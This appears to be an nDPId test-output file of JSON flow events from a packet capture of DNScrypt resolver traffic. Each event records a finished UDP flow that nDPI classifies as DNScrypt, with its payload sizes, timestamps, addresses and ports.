+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396074,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54204,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318205,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49040,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400551,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":40209,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304399,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59641,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318167,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":51935,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":49186,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":43748,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317822,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52069,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":39007,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312400,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":55896,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318200,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49115,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337076,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":45375,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396071,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54305,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317461,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":55046,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304362,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":53697,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311314,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38278,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396109,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":38242,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402187,"flow_last_seen":946739402352,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":59587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306435,"flow_idle_time":200000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1791,"flow_avg_l4_payload_len":895,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":41800,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318171,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":54096,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312103,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":52911,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348800,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":45815,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":36676,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396073,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48237,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311310,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38349,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58104,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304361,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":37413,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317463,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":49008,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305189,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":50335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348912,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":41895,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305220,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":53811,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396071,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48300,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400520,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":54920,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337077,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":55768,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305384,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":555,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":57465,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400518,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":56988,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396215,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":36335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305218,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":33369,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":59709,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739391046,"flow_last_seen":946739391308,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":50601,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
